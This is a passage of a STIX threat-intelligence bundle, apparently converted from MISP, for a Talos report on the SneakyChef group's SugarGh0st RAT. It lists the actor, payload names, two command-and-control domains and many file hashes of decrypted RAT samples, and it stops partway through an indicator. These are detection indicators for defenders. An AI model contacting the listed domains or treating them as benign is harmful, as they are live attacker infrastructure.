sneakychef-sugargh0st-rat.json

{"type": "bundle", "spec_version": "2.0", "id": "bundle--08c3e63e-9aa6-411a-bc86-aaa1070ebf9e", "objects": [{"type": "identity", "id": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Talos", "identity_class": "organization"}, {"type": "report", "id": "report--6eeb61ba-a84b-4cfd-87d3-71fdde16ad60", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "SneakyChef espionage group targets government agencies with SugarGh0st and more infection techniques", "published": "2024-06-21T12:14:22Z", "object_refs": ["x-misp-attribute--fa29d227-810b-4a94-8810-4ed0ff30eb2d", "x-misp-attribute--a03a979b-54f4-440e-83c0-75e6fdb20908", "observed-data--fa734bd7-4e86-465f-910f-8039624d21a5", "indicator--90a3f897-a411-472a-8ccb-4be89e63fbee", "indicator--85944bef-3047-4ab0-8b90-7bf343b1b1c4", "indicator--c6fc3c6e-e3c2-4be4-9bd0-c2ea19c7d0a5", "indicator--9bb4ecb3-ccd5-439d-b3dc-a676e2b9047e", "indicator--81787075-cbb7-4c8d-8305-ce1231185c05", "indicator--ce232965-28e9-4976-b63c-cb296f8cb901", "indicator--59737122-b996-4d25-8e50-57eff4c4fe0a", "indicator--ab4b9974-fc10-42b6-8cb7-5dcff4051ff4", "indicator--c902baa7-0bb1-42a9-89a0-4a6db30217cd", "indicator--63250d7d-5941-47ce-be31-98699d816e39", "indicator--9d657512-769b-4c74-8e0b-af3f4830a29c", "indicator--0131e162-9214-42de-bdcf-907e922feee2", "indicator--fe7a09ef-3a50-4903-9eb0-90b6de646f0e", "indicator--1e8efbf9-7c6a-4500-826b-e29770b72f72", "indicator--9612c667-4d11-4b4e-8f5b-b313ab138239", "indicator--477d64e4-beec-4048-a27e-aa3b99f1b2a9", "indicator--e445c52c-f0ba-49a0-a1de-ddddbb34c179", "indicator--b5210c5d-ac6a-4bf7-a158-eb0202304cce", "indicator--abd6b393-e2dc-4134-b411-56bff0c7ee69", "indicator--d865fce0-4fc1-4941-9dc8-b55b8ae1d935", "indicator--b563a12f-1e77-40c1-ad3e-0b55b86c648d", "indicator--89ef98be-def5-44f2-97a6-36fb444e5064", "indicator--b649af0d-963b-41f8-8984-d433ed8b9c4a", "indicator--59ddd88a-2ab5-4ad9-80a4-8b57c5d109b5", "indicator--b4a5814d-0c8a-4a87-a0f6-fa0e4b0a66a6", "indicator--d0956779-bd6f-440b-b146-d5cc781b2872", "indicator--9ce3a1bd-6677-49fc-bba0-cd7a98f7e1eb", "indicator--59057bf3-6220-4a96-ac49-458f2cad116d", "indicator--365ab122-e71d-4f97-a8b6-bd5036e035f7", "indicator--453439ce-14e4-48b1-bd22-b62fcfaa47da", "indicator--7cc6f2dd-8f4b-4915-bde7-3b23e8d9cd6f", "indicator--04fd3bb3-c9d7-48de-9dc8-ff6f18267231", "indicator--fd1e017e-a36c-4f32-ba13-54c5c999b98b", "indicator--fa5acfb5-1e1c-4015-a964-1d68014d3fe9", "indicator--8b95b4ba-0720-4cdd-86b2-f1c6873ca8f4", "indicator--183b298f-964e-4113-8165-d2e18c3f8ce8", "indicator--0eed57e1-b6d0-4ee5-836b-d4e253ca28f3", "indicator--4561be59-ef13-4b99-9df8-5e0721954a6e", "indicator--76a0b7e6-fe95-47ac-99e0-d0feeb8f1e04", "indicator--9f06f98b-9e9d-4da8-9d03-5c87e332919f", "indicator--eef5e602-f8af-478b-b078-2c43d71cf09f", "indicator--294b1a5e-80ab-4aa0-adff-84f7ccff7d42", "indicator--004d5974-3799-4235-8d6a-2e18e7b3af66", "indicator--337a442e-4495-4067-ae2e-9d92564018c8", "indicator--22f5e4ca-294c-483d-9a64-8c40f8a44865", "indicator--50a1b683-26e1-46e2-b28e-9dc26cefd8e9", "indicator--97bcc14e-c7ea-4ecb-a6a3-507cac3e0a89", "indicator--9de1c1fe-4740-4aa3-95eb-56e2a7d44bb8", "indicator--15a2c00a-b852-4b96-9b0b-5ad4e196492e", "indicator--fa17ca90-0d67-4384-ab75-98255c2e71c3", "indicator--58e0435b-6cd5-4a2d-b5c1-e1c03300c2d0", "indicator--3ac7bf41-0877-4a13-b7e3-ec834f73a576", "indicator--b9a2c24f-185e-4505-90d2-230cb0b052ee", "indicator--9802b013-445d-477a-adc3-e5072561fc7f", "indicator--14457179-5310-404c-82e4-13451899f4bf", "indicator--51677e36-30e1-4c18-9e35-110716d52dac", "indicator--dcdd5dc9-f60d-4b1a-b755-284eae3033ab", "indicator--3bc0c79d-41e1-4000-807d-d05290e5344c", "indicator--3e01d0e1-f8d8-479f-9d5f-2a57121b5b81", "indicator--68897ecf-1e90-428c-bc3d-d1434e66b7b9", "indicator--469403e9-ea50-4db3-8f22-da6747dc46d4", "indicator--555e14b3-2549-492f-9244-a94a4f1b12ac", "indicator--26c5b8d0-7437-40ce-ac7c-8da55c3ddbec", "indicator--c9727765-903d-4955-ac71-1e2d4d54de5c", "indicator--e89c5bed-5701-4689-a0b8-50bd69c27994", "indicator--e46033b3-57ad-4c0f-a867-d602de55d019", "indicator--8d021809-dc2d-4509-9e2c-493365ea1afc", "indicator--d5219c09-b2f1-4c23-8b1d-718ef6eccdd9", "indicator--93717411-b875-4675-8221-1ad4065ade3a", "indicator--99df17c8-febb-4b49-8ab2-da8e51bccb83", "indicator--a2abe63e-640d-4741-95a3-63ffe8ae170c", "indicator--c3f7aa63-d41c-4763-84c4-d8327fb80ad4", "indicator--52e26066-3aa6-477b-8bb9-48ebf9d10d84", "indicator--5d423281-c758-4dc8-bd1d-a59b6bde3b63", "indicator--59ac70c5-34e7-466f-a686-959e2bda5b8c", "indicator--a7a54017-989f-4729-a7de-58f11c46f35a", "indicator--789e13a5-c534-4aa0-87ad-22c9d436c9b8", "indicator--fe29b845-1b6c-4fd5-92cf-660c1908ef11", "indicator--f25385ef-e065-42dc-8a63-0517c352f28a", "indicator--3aa88adf-d56b-4ce9-9d48-3d4e9440bff7", "indicator--68baf0be-5855-4540-ba40-065119dad0c0", "indicator--6b296be4-3e6f-40fd-a449-7681141df090", "indicator--977a76ea-ca17-43fe-a7ca-99b89a8d3982", "indicator--3ecffff1-414e-4bc9-94f2-56650b0cfaf5", "indicator--bc044436-e162-43e9-bd85-d5505ec006e2", "indicator--68574461-cd05-4934-8248-f4d40f36f1a6", "indicator--07b6cb8e-3e1c-469e-9709-602aaac1faf7", "indicator--997b6c33-fa08-44aa-b395-d1de793a998e", "indicator--9a44f194-35dd-448f-93c2-487c57e749af", "indicator--7d175867-b502-4d40-ad5a-5a3788eea7fc", "indicator--ed9084b6-c33c-4dce-b107-4603fff35966", "indicator--a8c429c2-ef1a-4f74-8d72-10bb5e7210b0", "indicator--89479bdf-bf86-49f5-a969-748f027dba61", "indicator--126aafdd-72f0-4504-89c7-b90116dfc292", "indicator--a7b2209d-aba8-416f-9ac0-e288db94a9ee", "indicator--6523bb7c-2bd5-4574-947e-6816950dd159", "indicator--959144ec-707c-44f3-a92d-452269b0659b", "indicator--31cc7055-d867-4912-aa55-1d34d60562ba", "indicator--88032f64-0a3a-468a-b20f-e67fd5972b62", "indicator--6ee2deb3-c786-4338-af18-3e88efe32b67", "indicator--d5d14874-da5c-41e7-b34c-865cff787ce9", "indicator--942c6dab-ec03-4a4e-b67f-7670d140f344", "indicator--92124619-f4a4-4944-a23a-1e03b6eea724", "indicator--5cf81593-976c-432d-be3d-a81bbe050c96", "indicator--7afd12ad-b68d-4719-b735-716351d822b8", "indicator--4ea64b7c-4b70-4d7d-9659-2ca422c9e406", "indicator--a6f4314b-f37e-42fa-a6a6-a9b453052f91", "indicator--26606ab3-6101-44d4-9da1-b3d924fae337", "indicator--aa71e0e1-5235-4c45-be95-c23d8e0e292f", "indicator--5f47370a-c025-4e1d-946d-45184c0ee928", "indicator--973c2dfb-4f4e-4c29-b699-cd32b838913a", "indicator--5ac26f12-ebf6-4a79-9b3a-461a61fd0336", "indicator--a8b9e47f-9f86-466a-a680-3f7b7d9b54ec", "indicator--616aa340-4ff5-4e9f-9d2a-402b2c0d208b", "indicator--5b9787cf-0a5d-47f4-933e-4b9cf044e232", "indicator--1ca57c2b-8e4a-42ed-bafa-a106cbbc363d", "indicator--21caa1eb-3474-417d-b840-ee0290dc3383", "indicator--a3e537e4-aa48-42e0-bcce-389268fc9af0", "indicator--c889a5a6-fbdb-4441-8e6e-d8c66199a6fb", "indicator--d59829f8-181f-4c85-9513-0320e8e21465", "indicator--8f09eac1-5551-4cac-afa0-01a41231978c", "indicator--0da12927-e943-4516-adae-5cb9ebfe973d", "indicator--f4ca19a5-b5fe-45f0-9143-83d0523c85e1", "indicator--e154a8ca-fcee-476b-99fd-199fb4e61a19", "indicator--79f280de-ff3f-4c56-9304-1c8a2bc6cbf4", "indicator--4bcdb3e1-88f1-4d97-a0ff-23b6e1a99bab", "indicator--7f49d4ab-f033-46bb-8668-fd7daea19462", "indicator--8e63f46b-17ee-432f-8bc3-87be9ad97efc", "indicator--7e9d47dd-6767-41a1-8300-651eda509db4", "indicator--9de2a8bf-23a0-456b-892f-0234cde7c773", "indicator--939b4f00-05ad-4620-8d3a-c61effe72dcf", "indicator--f886350c-1d12-4c20-981c-f195ab5bcfb0", "indicator--f2733d9c-de03-485e-8b2e-65e69d176dc6", "indicator--868385b2-a38d-4645-97ac-e64ca0da2c68", "indicator--a67ffa6e-0aee-4a2a-8741-46edcecd0da9", "indicator--3921e712-ec5e-4454-baea-67035fb2efed", "indicator--5d0a2c88-9adb-4a0c-9547-40567fc76c77", "indicator--eca477c7-0d4e-4d45-958b-cf7be7d50d1e", "indicator--715bc095-4974-4715-b8cd-57d2db13a770", "indicator--05993e61-45ea-40ce-a35b-c08e71a15c57", "indicator--e2e2604e-7060-4b45-9077-7c80e9a15fc3", "indicator--d75eb593-345e-4a8b-8c64-5a53d4fda34d", "indicator--2ce951e8-c41d-45dd-a553-e477f81aa2c3", "indicator--4d033fe2-b1b7-417a-8955-c26dc1884ddb", "indicator--98264004-0cd9-4add-9af5-d6647e55d32e", "indicator--f2fcfa1d-0b52-4afb-a7f5-2fd680815c66", "indicator--0457bee4-2e48-4d33-9e76-8c8772a073a6", "indicator--49fc12e2-76da-4892-95a9-dd6f73604892", "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b"], "labels": ["Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "Talos_Intel_Blog", "tlp:clear", "Remote Access Trojan"]}, {"type": "x-misp-attribute", "id": "x-misp-attribute--fa29d227-810b-4a94-8810-4ed0ff30eb2d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:55:58.000Z", "modified": "2024-06-19T07:55:58.000Z", "labels": ["misp:type=\"threat-actor\"", "misp:category=\"Attribution\""], "x_misp_category": "Attribution", "x_misp_comment": "Threat actor SneakyChef", "x_misp_type": "threat-actor", "x_misp_value": "SneakyChef"}, {"type": "x-misp-attribute", "id": "x-misp-attribute--a03a979b-54f4-440e-83c0-75e6fdb20908", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:56:55.000Z", "modified": "2024-06-19T07:56:55.000Z", "labels": ["misp:type=\"text\"", "misp:category=\"Payload type\""], "x_misp_category": "Payload type", "x_misp_type": "text", "x_misp_value": "SugarGh0st\r\nSpiceRAT"}, {"type": "observed-data", "id": "observed-data--fa734bd7-4e86-465f-910f-8039624d21a5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:58:15.000Z", "modified": "2024-06-19T07:58:15.000Z", "first_observed": "2024-06-19T07:58:15Z", "last_observed": "2024-06-19T07:58:15Z", "number_observed": 1, "objects": {"0": {"type": "url", "value": "https://blog.talosintelligence.com/sneakychef-sugargh0st-rat/"}}, "labels": ["misp:type=\"url\"", "misp:category=\"External analysis\""]}, {"type": "indicator", "id": "indicator--90a3f897-a411-472a-8ccb-4be89e63fbee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "C2", "pattern": "[domain-name:value = 'account.drive-google-com.tk']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--85944bef-3047-4ab0-8b90-7bf343b1b1c4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "C2", "pattern": "[domain-name:value = 'account.gommask.online']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c6fc3c6e-e3c2-4be4-9bd0-c2ea19c7d0a5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8a563b3091b56eb0562f5442c90b4d28d4be2946a3dc4a225b4b96134f7e447b']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9bb4ecb3-ccd5-439d-b3dc-a676e2b9047e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'd6bffa45aa2448b2fb584713395b742e02ef77c1d54f125cd501240e0dd91a13']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--81787075-cbb7-4c8d-8305-ce1231185c05", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '951a54d2c61c3257447c4ff5fd451ee581c76d3d4d88fa482b99f5410d7b7b6f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ce232965-28e9-4976-b63c-cb296f8cb901", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8db5a7efe1a83e43cb4acdc596b0413b4beb54f9f8e13f978c07a6eeee6b8435']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59737122-b996-4d25-8e50-57eff4c4fe0a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '31b7e97770ffe74dad914a37a78c8f9a7286c75b62b5fae1c4ec722837ad457e']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ab4b9974-fc10-42b6-8cb7-5dcff4051ff4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'e56537d09156bb77f4821d5ce005c7840ec41890de233d88a1152f68110098cf']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c902baa7-0bb1-42a9-89a0-4a6db30217cd", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '06056f83e93849124dc435166c1b463bf34bbf99ea5671221ddaf6641e3db4f4']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--63250d7d-5941-47ce-be31-98699d816e39", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '81ded17e368abc280db4d9f83fb0aebe1ec58eb7e4103f98f0fb5269c8696551']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9d657512-769b-4c74-8e0b-af3f4830a29c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8190e8990bb7bc860691ce2d3ff6015d7f9a0339e77aa7c6e5e3ae5209bd6f4c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0131e162-9214-42de-bdcf-907e922feee2", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '727bcb28eb0282a389bd2c82e3fac57a9c348aedee23d18c8d136bbd8803b642']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fe7a09ef-3a50-4903-9eb0-90b6de646f0e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '0b6dcf9ba14096c631bd9a3f90180c5f6ad9177a8283724146425b2f08b53e02']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--1e8efbf9-7c6a-4500-826b-e29770b72f72", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '653c3ea0ce07880ffe3a2acd735770cc2cbedb137cb5a29d4b059af5a569f98f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9612c667-4d11-4b4e-8f5b-b313ab138239", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '2547f1a874c552da17abf6d5f88e626ed4bda71ca0bb39b2bc13b2d748a05409']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--477d64e4-beec-4048-a27e-aa3b99f1b2a9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4b1f3cc69e905137263ec8c39bbdcbccd5e33c3abffe54d77de847a998fcf17a']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e445c52c-f0ba-49a0-a1de-ddddbb34c179", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '48cc1d2df6ea2a04201e74ce59983a0bf0964d59a0e5c5647068b653a0ec66d5']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b5210c5d-ac6a-4bf7-a158-eb0202304cce", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '05758a568e30b3f35092b8d43bf4f29a3e5e9b988dc541d51fc8233ebbec2874']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--abd6b393-e2dc-4134-b411-56bff0c7ee69", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'a22e16fad2d88de1a625201408b2262d8335bef3d944f4f696ad825973af124d']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d865fce0-4fc1-4941-9dc8-b55b8ae1d935", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7684296728c10249f671cf80b58e04633031e1b74a88e8b4f7d31776fc643d10']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b563a12f-1e77-40c1-ad3e-0b55b86c648d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '375e0b117c7e45266e9544c23e226dd791ac32d094e60b858ff823577be43acb']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--89ef98be-def5-44f2-97a6-36fb444e5064", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '944cd95eaf496ad6dd8859032c4577ad6917dec3a4c300eeca762e08a97243f5']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b649af0d-963b-41f8-8984-d433ed8b9c4a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '6b327a15877528e5e5b0891fd587cb2fc932d94404c756401af628195eb94831']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59ddd88a-2ab5-4ad9-80a4-8b57c5d109b5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8cd0026ba4f0c8984bdb6daaddb6fa17088e3b9272859cc2c03195d36f47f334']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b4a5814d-0c8a-4a87-a0f6-fa0e4b0a66a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '06ac9bcbc1d026fbe9a261afe62a1b5704dc64b89a28dae47441fa6ef6230eb9']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d0956779-bd6f-440b-b146-d5cc781b2872", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '2432f192511fb377d69619fc7eb0612570e22e3ba88fc42e841552a66fe2dc8f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9ce3a1bd-6677-49fc-bba0-cd7a98f7e1eb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st 